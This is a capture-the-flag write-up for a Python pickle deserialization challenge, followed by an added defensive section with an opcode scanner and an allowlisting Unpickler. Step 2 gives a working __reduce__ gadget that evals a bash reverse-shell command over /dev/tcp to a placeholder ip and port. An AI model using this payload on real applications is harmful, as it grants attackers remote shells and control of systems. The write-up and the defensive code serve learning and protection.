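I. Challenge
Challenge: myfavorPython
Challenge description:
II. WriteUp
1. Feature probing
Visit http://127.0.0.1:5000/register
After registering successfully
2. Approach: base64-encode the serialized byte stream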
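import pickle
import base64
import pickletools

# Expression the target evaluates during unpickling; ip and port are placeholders.
cmd = "__import__(\"os\").popen('bash -c \"/bin/bash -i >& /dev/tcp/ip/port 0>&1\"').read()"

class A(object):
    # __reduce__ tells pickle how to rebuild the object: call eval(cmd) on load.
    def __reduce__(self):
        return (eval, (cmd,))

a = A()
b = pickle.dumps(a)
# Base64-encode the serialized byte stream for submission.
print(base64.b64encode(b))
# Disassemble the pickle to show the opcodes it contains.
pickletools.dis(b)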
3. After getting a shell, simply run cat flag.txt
III. Summary
1. Reference link for learning Python deserialization
https://blog.csdn.net/weixin_62808713/article/details/130048382
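The defensive counterpart to step 2, as an added example that is not part of the original write-up or the challenge code: it statically scans a base64 pickle for import and call opcodes with pickletools (the same module used above for disassembly) and loads data through an allowlisting Unpickler. It assumes the application base64-decodes user input and unpickles it; `scan_pickle`, `AllowlistUnpickler`, `safe_loads` and the sample blobs are hypothetical names and constructed data.

```python
import base64
import io
import pickle
import pickletools

# Opcodes that invoke a callable while the pickle is being loaded.
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}

def scan_pickle(b64_blob):
    """List import/call opcodes in a base64 pickle without ever loading it."""
    data = base64.b64decode(b64_blob, validate=True)
    findings, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if isinstance(arg, str):
            strings.append(arg)          # operands a later STACK_GLOBAL may consume
        if op.name in ("GLOBAL", "INST"):
            findings.append(("import", arg.replace(" ", ".")))
        elif op.name == "STACK_GLOBAL":  # heuristic: module and name are the last two strings
            findings.append(("import", ".".join(strings[-2:])))
        if op.name in CALL_OPS:
            findings.append(("call", op.name))
    return findings

class AllowlistUnpickler(pickle.Unpickler):
    ALLOWED = frozenset()  # plain dict/list/str/int data needs no globals at all

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)

def safe_loads(b64_blob):
    """Deserialize only data whose globals are on the allowlist."""
    raw = base64.b64decode(b64_blob, validate=True)
    return AllowlistUnpickler(io.BytesIO(raw)).load()

# Constructed samples: a __reduce__ gadget of the same shape as the one in the
# write-up but with a harmless expression, and an ordinary data record.
class _Demo:
    def __reduce__(self):
        return (eval, ("1+1",))

SUSPECT = base64.b64encode(pickle.dumps(_Demo()))
BENIGN = base64.b64encode(pickle.dumps({"user": "alice", "age": 20}))

if __name__ == "__main__":
    print(scan_pickle(SUSPECT))
    print(scan_pickle(BENIGN))
```

The scan is a triage aid only, since opcode operands can be routed through the memo to defeat string matching; the allowlist in `find_class` is the control that actually blocks the load.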